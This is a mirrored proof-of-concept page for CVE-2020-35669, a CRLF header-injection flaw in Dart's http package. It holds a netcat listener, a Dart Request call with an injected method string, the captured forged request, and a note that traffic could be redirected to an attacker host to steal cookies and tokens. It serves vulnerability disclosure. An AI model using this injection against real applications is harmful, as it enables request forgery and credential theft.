Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2020-35669 PoC — Google Http package For Dart 注入漏洞

Source
https://github.com/n0npax/CVE-2020-35669
Associated Vulnerability
Title:Google Http package For Dart 注入漏洞 (CVE-2020-35669)
Description:An issue was discovered in the http package through 0.12.2 for Dart. If the attacker controls the HTTP method and the app is using Request directly, it's possible to achieve CRLF injection in an HTTP request.
Readme
# [CVE-2020-35669](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35669)

## dummy server
please run dummy server using 1st terminal
```bash
sudo nc -l 127.0.0.1 80 
```

## apply given diff
```diff
diff --git a/main.dart b/main.dart
index 8c78291..a46f4d0 100644
--- a/main.dart
+++ b/main.dart
@@ -4,7 +4,7 @@ import 'package:http/src/request.dart';
 void main() async {
   var r = Request(
       "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
-      Uri(scheme: "http", path: "/llama", host: "google.com"));
+      Uri(scheme: "http", path: "/llama", host: "localhost"));
   var rs = await r.send();
   var resp = await Response.fromStream(rs);
   print('${resp.body}');

```

## run dummy app
please execute `main.dart` using 2nd terminal
```bash
dart run main.dart
```

## result
nc should recieve given request
```http
GET HTTP://EXAMPLE.COM/ HTTP/1.1
HOST: EXAMPLE.COM
LLAMA: /llama HTTP/1.1
user-agent: Dart/2.10 (dart:io)
accept-encoding: gzip
content-length: 0
host: localhost
```

### Important piece of code
```dart
  var r = Request(
      "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
      Uri(scheme: "http", path: "/llama", host: "google.com"));
  var rs = await r.send();
```

## Critical path

Assuming `diff` showed above was not applied and **user is behind `rev-proxy`** Website served by `example.com` was reached.
```bash
dart run main.dart
<!doctype html>
<html>
<head>
    <title>Example Domain</title>

    <meta charset="utf-8" />
    ...
    ... blah blah blah
    ...

```
### Why this is a security risk
If the developer is using Request to abstract generating HTTP calls and he's accepting a method param from the user, the user can do some magic like header injection or path forgery.
This can be exploited in many ways and seems to be quite important especially in case there is a reverse proxy is in place. A proxy may just pass someone's request to any host base on `host` header. 
Let's assume I'm replacing example.com with my-evil-uservice.org and the victim is working in a company behind the proxy. This means I can redirect calls with headers/cookies(tokens) and blah blah blah. Base on this, stealing calls with all headers/cookies can happen.
File Snapshot

 [4.0K]  /data/pocs/936175a4e6d8326a2224fbcdf00b19ed0609de56
├── [ 376]  main.dart
├── [1.8K]  pubspec.lock
├── [  98]  pubspec.yaml
└── [2.2K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →